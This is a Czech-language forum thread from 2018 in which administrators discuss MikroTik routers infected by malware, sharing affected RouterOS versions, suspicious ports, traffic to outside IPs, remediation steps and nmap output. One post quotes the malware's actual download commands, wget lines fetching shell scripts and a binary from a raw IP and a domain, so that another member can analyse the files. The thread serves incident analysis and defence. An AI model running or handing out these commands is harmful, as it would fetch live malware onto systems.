MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[vencakubik]

Abych odpověděl trochu na otázky, sorry za zdržení, řešil jsem ty napadené MK a hledal další napadené v síti.
K verzím, našel jsem to na verzi 6.30.4; 6.34.4; 6.42.1; 6.42.2 i na 5.26
V ip/services
zakázané api, api-ssl, ftp, telnet, ssh port změněn na 2222, www port 8080, winbox 8291. Bohužel bez omezení na IP rozsah nebo konkrétní IP.
Users standard admin, silné heslo, ale omezení na vstup pouze z IP rozsahu vnitřní sítě!
V ip/firewall zakázaný pouze tcp/25 a udp/53 input.
Teď k tomu že si myslím že po upgradu už tam "vir" není. Než jsem zařízení rebootnul, oskenoval jsem si jeho otevřené porty, měl otevřený port 3553, který není zase tak typický. Při pozorování přes torch se neustále snažil komunikovat s IP adresou: 93.99.117.15 a 103.1.221.167, zkoušel si osahat porty 22,23,53,80,81,82,8080,8081,8082,8880,8888, pak otevíral telnet právě na tyto dvě IP adresy. Jedna je česká, takže můj úsudek že druhá strana je také "zavirovaná" a posílají "něco". Druhá IP už zrovna česká není.
Postupoval jsem tak, že jsem obě dvě IP zakázal před napadeným MK, komunikace utichla, změnil jsem DNS a upgradnul na poslední verzi 6.42.5, ihned po rebootu jsem upgradnul i firmware desky. Po naněhnutí jsem zkontroloval partition size, zda-li souhlasí s hardwarovou velikostí desky.
Pak sken otevřených portů, 3553 zavřený a i když jsem povolil zpět ty dvě IP adresy, už s nimi nekomunikoval.

A ještě doporučím, kdo měl nějakého napadeného MK, určitě změňte hesla v celé síti! U prvních MK co jsem našel že jsou zavirovaný jsem v logu našel spusty zkoušení hesel na ssh až to najednou vyšlo, ale dnes co jsem našel MK další, už žádné zkoušení nebylo, připojil se tam na první dobrou.

[Myghael]

Díky za příspěvek. Každopádně minimálně jedna z těch zranitelností se týkala právě web rozhraní, které jsi měl zapnuté, podle mého tedy pravděpodobný vektor útoku, byl-li zdroj nákazy uvnitř tvé sítě. Ochranu proti spoofingu na síti máš?

[the.max]

Dobrej popis postupu. Jen by mě zjaímalo, kde je vidět velikost pártišen.

[TheITman]

Pánové bylo by možné dodat všechny soubory viru ne pouze scripot? chybí mi soubor o.sh , zxcvbnm.txt a winbox.idx o kterých vyplývá že se natáhnou se skriptem to samé stop.txt vše by mnělo být v adresáři /tmp za příapdné reakce bduu vděčný, mým cílem je pochopit jak tady ta zas*aná věc funguje Díky

[Dalibor Toman]

Pánové bylo by možné dodat všechny soubory viru ne pouze scripot? chybí mi soubor o.sh , zxcvbnm.txt a winbox.idx o kterých vyplývá že se natáhnou se skriptem to samé stop.txt vše by mnělo být v adresáři /tmp za příapdné reakce bduu vděčný, mým cílem je pochopit jak tady ta zas*aná věc funguje Díky

wget http://141.105.64.212/36/a.sh -O a.sh
wget http://141.105.64.212/36/b.php -O update.sh
wget -T 20 http://vn8d2x8q.com/pic/3.jpg -O zxcvbnm

v teto chvili jde vsechno stahnout

zxcvbnm je binarka. Tak hodne stesti

winbox.idx je soubor ktery vetsinou existue a obsahuj casto seznam DLLek (uz obsolete). Skripty ho mazou ale nevytvareji.

[TheITman]

[quote="Dalibor Toman"]
Děkuji za odpověď, tyto soubory mám stažené, nicméně ve scriptu a.sh je na řádkuč.2 vymaž o.sh jenže tento soubor jsem neviděl nikde ve scriptu vytvořit či stáhnout. proto mně tento soubor zajímá stejně jako soubor stop.txt

[mac0112]

Pomůže, když SSH a Winbox bude přístupné pouze z určité adresy nebo je to jedno ?

[mpcz]

No je to samozřejmě malá bariéra navíc, kterou lze ale také obejít. Každopádně neuškodí.


Stále se to tady točí dokolečka, zajímavé informace přibývají. Bohužel zásadní otázky stále nemají odpovědi. Myslím např. tyto:
1/ Nová instalace s poslední verzí ROS 6.42.5, popř. s IP services pouze na změněný winbox - zavirovalo se to už někomu, popř. jak?
2/ Umíme detekovat zavirovaný stroj?, popř. jak. To je zásadní otázka. Získat přístup k souborům linuxu a ROSu není žádný problém, takže by to nemuselo být tak složité (pro toho, kdo se tím živí), např. pro tvůrce ROS. Možná je dost takových, kteří spokojeně upgradují ROS na "bezpečnou" verzi a přitom mají již delší dobu v ROSu zadní vrátka.
3/ Jak zkontrolovat velikost a počet partition při podezření na usídlení viru?
4/ Dovede si upgrade ROS poradit se zavirovaným strojem a vir zlikviduje?
5/ Je nebezpečí, že při upgrade zavirovaného stroje na "bezpečnou" verzi dojde k blokaci stroje?
6/ Lze se dostat do zavirovaného a zamklého stroje, popř jak?
atd. ... mpcz, 11.jul.2018

[Dalibor Toman]

5/ Je nebezpečí, že při upgrade zavirovaného stroje na "bezpečnou" verzi dojde k blokaci stroje?

zazil jsem pri upgrade RB433 z 6.36 na 6.40.8, ze po rebootu byla aktivni defaultni CFG jako na novem kusu.

[mpcz]

Zdravím, na některých strojích mikrotik jsem narazil na otevřené porty 8266 a 7252. Nejsem si vědom manipulace s nimi. K čemu by mohly sloužit? Ví někdo? Děkuji, 13.07.2018

[Myghael]

Tyhle porty ne, zkoušel jsi je skenovat, co na nich běží? Případně kdyby bylo možno "zveřejkovat", rád bych se na to mrkl.

[mpcz]

Zkusil jsem port 8266 oskenovat na různých strojích a skoro všude byl otevřený/filtered. Může to prosím někdo zkusit taky? Děkuji. mpcz, 14.7.2018

[the.max]

ať zkouším skenovat cokoli mě napadne doma, na síti nebo i venku v netu, tak výsledek je takovej:

Kód: Vybrat vše

themax@bobika / $ nmap aaa.bbb.ccc.ddd -p8266
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-14 21:55 CEST
Nmap scan report for aaa.bbb.ccc.ddd
Host is up (0.012s latency).

PORT     STATE  SERVICE
8266/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
themax@bobika / $

[mpcz]

1/
Starting Nmap 7.70 at 2018-07-14 21:18 Střední Evropa (letní čas)
Nmap scan report for xxxxxxx.xxxxx.net (178.238.xx.xx)
Host is up (0.055s latency).
PORT STATE SERVICE
8266/tcp filtered unknown

2/
Starting Nmap 7.70 at 2018-07-14 22:53 Střední Evropa (letní čas)
Nmap scan report for 29-195-xxx-xx-cust.xxxxxxx.cz
Host is up (0.026s latency).
PORT STATE SERVICE
8266/tcp filtered unknown
mpcz, 14.7.2018

[the.max]

To spíš vypadá, jako by někde po cestě od tebe byl ten port ve firewallu filtrovanej.